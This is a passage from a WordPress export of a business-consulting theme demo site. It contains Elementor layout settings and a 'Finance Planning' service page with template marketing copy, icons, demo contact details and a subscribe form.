research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb2e77","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"64a2dd8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"87b1729","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"f10f882","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9647d28","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"89800c0","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"a10b197","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1f4fc86","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7074fb9","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"cea57b4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf.jpg","id":955},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"abb1881","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"699b921","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6daa555","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"628f10c","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ee295dc","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"35a7b37","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"f013cc5","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1506]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/</link>
		<pubDate>Tue, 22 Sep 2020 02:55:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1002</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1002</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:55:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:55:25]]></wp:post_date_gmt>
